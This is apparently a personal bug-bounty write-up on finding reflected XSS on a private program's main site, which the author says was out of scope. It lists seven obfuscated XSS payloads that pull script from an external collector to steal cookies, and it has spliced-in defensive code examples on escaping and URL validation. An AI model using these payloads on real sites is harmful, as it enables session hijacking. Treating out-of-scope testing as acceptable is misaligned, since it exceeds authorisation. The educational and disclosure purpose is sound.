How Did I Get My First Collaboration Bounty Of $1000?


Guru Prasad Pattanaik

My First Collaboration Bounty Of $1000

Hello Infosec Community,

I’m Guru Prasad Pattanaik, aka TH3N00BH4CK3R. Before we start, I want to give you the context behind my story. I come from a completely non-tech background (I have done a BSc in Physics, but I really love technology). I just wanted to say that I started bug hunting recently, about 6 months ago. I’m writing my first article, so I’m a bit nervous about it. I humbly request everyone to please correct me if I go wrong somewhere. So, with that being said, let’s start.

My friend Yeshwanth and I collaboratively hunted on a private program on Bugcrowd, i.e. redacted.com (I cannot share the program's original name due to the company's security compliance), which fetched me my first collaboration bounty reward of $1000. In this write-up, I will share the methodology I used to get this.

I had submitted a bug on NASA and got a Hall of Fame for the same. I published my achievement story on my LinkedIn and Instagram accounts. One fine day, I received a text on my LinkedIn account from Yeshwanth regarding a collaboration on bug hunting. As I was new to the field and didn’t have many private invitations from programs, I decided to agree and hunt collaboratively.

Methodology
Reconnaissance Phase

As most of us do, I tried running the subfinder & amass tools to gather all possible subdomains of redacted.com and sorted them using the httpx tool. It gathered almost 100+ subdomains. I also did Google Dorking to gather unique or different subdomains.

The idea behind this is to get juicy subdomains or some unvisited or un-crawled subdomains.

I used a very popular browser extension called Wappalyzer to understand the tech stack behind the web application. I literally visited each and every domain to check its tech stack. I checked all subdomains based on their functionalities, i.e. Sign-In/Sign-Up, Forgot Password/Reset Password, input fields, etc.

I tried HTML Injection, EXIF meta-data leak, Rate Limiting on Forms/Account Creation and Deletion, Password Reset Poisoning, and Sensitive Information Disclosure but nothing worked for us.

After spending almost a week on testing, we found nothing.

The in-scope assets of the program were sandbox.redacted.com and *.api.redacted.com only. After spending a week’s time and getting zero results, we became frustrated. Yeshwanth said, "let’s change the program, as we are not getting anything," but I had an intuition that I would get bugs on this web application. So I randomly visited redacted.com instead of sandbox.redacted.com. I saw a major difference there. The site sandbox.redacted.com only has limited functionalities of the main domain redacted.com.

This sparked a curiosity in my mind to test the main domain as well, although it was not in the scope of the program.

I immediately tested the input fields with the classic HTML Injection payload, but it didn’t work for me. I noticed that the website reflects the query, so I decided to check the source code of the page. I checked for the reflections and got to know that it’s not using proper sanitization methods. So I modified my payload, and it worked for me.

Basic Payload: <h1>YOU HAVE BEEN HACKED</h1>
Modified Payload: "><marquee>YOU HAVE BEEN HACKED</marquee>
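Added example (not code from the write-up) showing one common reason the two payloads above behave differently, and the fix. It assumes the search term was reflected inside a quoted HTML attribute; under that assumption the plain <h1> payload stays inert as attribute text, while the "> variant closes the attribute and the tag, which is also the breakout the later XSS payloads rely on. Template, helper names and the tag counter are hypothetical.

```javascript
// Payloads quoted from the write-up.
const BASIC_PAYLOAD = '<h1>YOU HAVE BEEN HACKED</h1>';
const MODIFIED_PAYLOAD = '"><marquee>YOU HAVE BEEN HACKED</marquee>';

// Assumed vulnerable template: the search term is interpolated raw into a
// quoted attribute value (hypothetical, modelled on the "search parameter").
function renderSearchVulnerable(q) {
  return `<input type="text" name="q" value="${q}">`;
}

// Context-aware fix: encode the characters that can end an attribute value
// or start a tag before placing untrusted text inside an HTML attribute.
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSearchFixed(q) {
  return `<input type="text" name="q" value="${escapeHtmlAttr(q)}">`;
}

// Minimal quote-aware start-tag counter (a stand-in for a real DOM parser):
// it skips over quoted attribute values so that a '<' inside value="..."
// is not mistaken for a new element, mirroring how a browser tokenises it.
function countStartTags(html) {
  let count = 0;
  for (let i = 0; i < html.length; i++) {
    if (html[i] !== '<' || !/[a-zA-Z]/.test(html[i + 1] || '')) continue;
    count++;
    let quote = null;
    for (i++; i < html.length; i++) {
      const c = html[i];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      else if (c === '>') break;
    }
  }
  return count;
}

// Number of elements a payload managed to add beyond the legitimate <input>.
function injectedElements(html) {
  return countStartTags(html) - 1;
}

console.log(injectedElements(renderSearchVulnerable(BASIC_PAYLOAD)));    // 0: stays inside the attribute
console.log(injectedElements(renderSearchVulnerable(MODIFIED_PAYLOAD))); // 1: "> closed the attribute and tag
console.log(injectedElements(renderSearchFixed(MODIFIED_PAYLOAD)));      // 0: encoded, so it is only text
```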

I was really happy that finally after so much hard work I found this bug. I immediately called Yeshwanth and told him that I got this on the main site instead of the In-Scope Domain. As he was in college then, he said he would join me in some time. I was in a dilemma about whether this would be accepted or not but since it was on the main site. It gave me rays of hope to continue forward with the testing and escalate the issue.

Now, since HTML Injection had worked here, I decided to try a Cross-Site Scripting attack. When I tried an XSS payload in the input field, it didn’t work.

So I read several reports on HackerOne and Medium regarding XSS. After reading many reports, I got to know about bypassing XSS filters and XSS polyglot payloads. So, I created an account on xss.report.

I used an XSS polyglot payload from xss.report and it worked here. In the dashboard, I received the report of the XSS being fired. I was in seventh heaven. Then I decided to escalate further to Account Takeover, as many of the reports suggest.

I used a document.cookie payload and encoded that to extract the cookies from redacted.com.

XSS Report
XSS Payloads that I used

1. java%0d%0ascript%0d%0a:eval('var a=document.createElement(\'script\');a.src=\'https://xss.report/c/XXXXX\';document.body.appendChild(a)')
2. javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*&lt;svg/*/onload=(import(/https:\xss.report\c\XXXXX/.source))//>
3. java%0d%0ascript%0d%0a:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*&lt;svg/*/onload=(import(/https:\xss.report\c\XXXXX/.source))//>
4. "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2d1cjkxNiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; onerror=eval(atob(this.id))>
5. %22%3E%3Cimg%20src=x%20id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2d1cjkxNiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61;%20onerror=eval(atob(this.id))%3E
6. javascript:%22/*'/*%60/*--%3E%3C/noscript%3E%3C/title%3E%3C/textarea%3E%3C/style%3E%3C/template%3E%3C/noembed%3E%3C/script%3E%3Chtml%20%22%20onmouseover=/*&lt;svg/*/onload=(import(/https:%5Cxss.report%5Cc%5CXXXX/.source))//%3E
7. java%0d%0ascript%0d%0a:%22/*'/*%60/*--%3E%3C/noscript%3E%3C/title%3E%3C/textarea%3E%3C/style%3E%3C/template%3E%3C/noembed%3E%3C/script%3E%3Chtml%20%22%20onmouseover=/*&lt;svg/*/onload=(import(/https:%5Cxss.report%5Cc%5CXXXX/.source))//%3E
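Added example (not from the write-up) of the server-side check a defender needs for user-supplied link targets, given payload shapes like items 1, 3 and 7 above. Browsers drop CR, LF and TAB from a URL before parsing its scheme, so a validator that inspects only the raw string sees no dangerous scheme; this version normalises the value first and then allow-lists schemes. Function names, the allow-list and the sample values are hypothetical; the sample bodies are benign.

```javascript
// Schemes a link field may legitimately carry (hypothetical allow-list).
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Naive check that many filters use: looks only at the literal prefix.
function naiveIsSafe(raw) {
  return !String(raw).toLowerCase().startsWith('javascript:');
}

// Bring the value into the form a browser will actually parse: undo one layer
// of percent-encoding, drop tab/newline anywhere, trim C0 controls and space.
function normaliseHref(raw) {
  let s = String(raw);
  try { s = decodeURIComponent(s); } catch (_) { /* malformed %xx: keep raw */ }
  return s.replace(/[\t\n\r]/g, '').replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
}

// True only if the normalised value parses and its scheme is allowed; relative
// links resolve against the site origin (hypothetical origin used here).
function isSafeHref(raw) {
  let url;
  try { url = new URL(normaliseHref(raw), 'https://app.example.invalid/'); }
  catch (_) { return false; }
  return SAFE_SCHEMES.has(url.protocol);
}

// Constructed samples modelled on the shapes in the list above.
const SAMPLES = {
  plainLink: 'https://docs.example.invalid/help',
  relativeLink: '/search?q=shoes',
  splitScheme: 'java%0d%0ascript%0d%0a:void(0)',   // CR/LF inside the scheme
  leadingJunk: ' \t JavaScript:void(0)',            // whitespace + mixed case
};

// Compare both checks on every sample: { name: [naiveVerdict, normalisedVerdict] }.
function compareChecks() {
  return Object.fromEntries(
    Object.entries(SAMPLES).map(([k, v]) => [k, [naiveIsSafe(v), isSafeHref(v)]]),
  );
}

console.log(compareChecks());
```

The split-scheme sample passes the naive check but is rejected once normalised, which is the gap a reflected link parameter needs closed server-side.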

Achieving The Target

Now that I had got the XSS fired and received the cookies, I thought about escalating the bug to Account Takeover. For this, I installed a very famous browser extension called Cookie Editor. As this XSS report contained only my own cookies, it wouldn't be accepted on Bugcrowd as it’s Self-XSS. So, I decided to escalate this.

The RXSS was on the search parameter, so I simply crafted the search query and opened that in a different browser. Once the link loaded, it also fired the RXSS and fetched the cookies of the victim. Now, as I had the cookies of the victim, I tried editing the cookies using the cookie editor and then refreshing the page. But it didn’t work for me. (You can guide me in the comments on why this wasn’t working.)

Performing all this took time and I was scared: “what if this goes Duplicate or Out Of Scope?” So without wasting a single minute, I recorded a Proof-Of-Concept video of the same with a detailed explanation. By midnight we submitted the bug on the program.

The program did not respond for the first 5 days. Trust me, this phase was no less than a nightmare for both of us. In the first response to the submission, they asked us for the cookies which got fired when they tried to reproduce the issue. We proceeded further with the required details, but in the very next reply, they marked our submission as Out-Of-Scope. On seeing this, we both were in total shock. After this, Yeshwanth consoled me and I consoled him. All our expectations were shattered. But then, the next night around 0300 HRS, Yeshwanth received a mail that our submission had been changed to P2 and its state was triaged. He also couldn’t believe this, so he immediately called me. We re-checked it almost 5–6 times as we couldn't believe our eyes.

Finally, after a week I Got My First Collaboration Bounty of $1000


I would like to thank all my mentors, friends, and fellow mates who always guided me, supported me, and helped me grow.

I hope you all enjoyed this and learned something new. I know this is not a very technically sound write-up, but I’ll try to improve from next time onwards.

Your Feedback would mean a lot to me and help me even grow better.

Do Like, Share, and Comment!!!

Follow me on my Socials

LinkedIn: https://www.linkedin.com/in/guru-prasad-pattanaik/

Instagram: https://www.instagram.com/guru.p05/

Twitter: https://x.com/gurupra9161
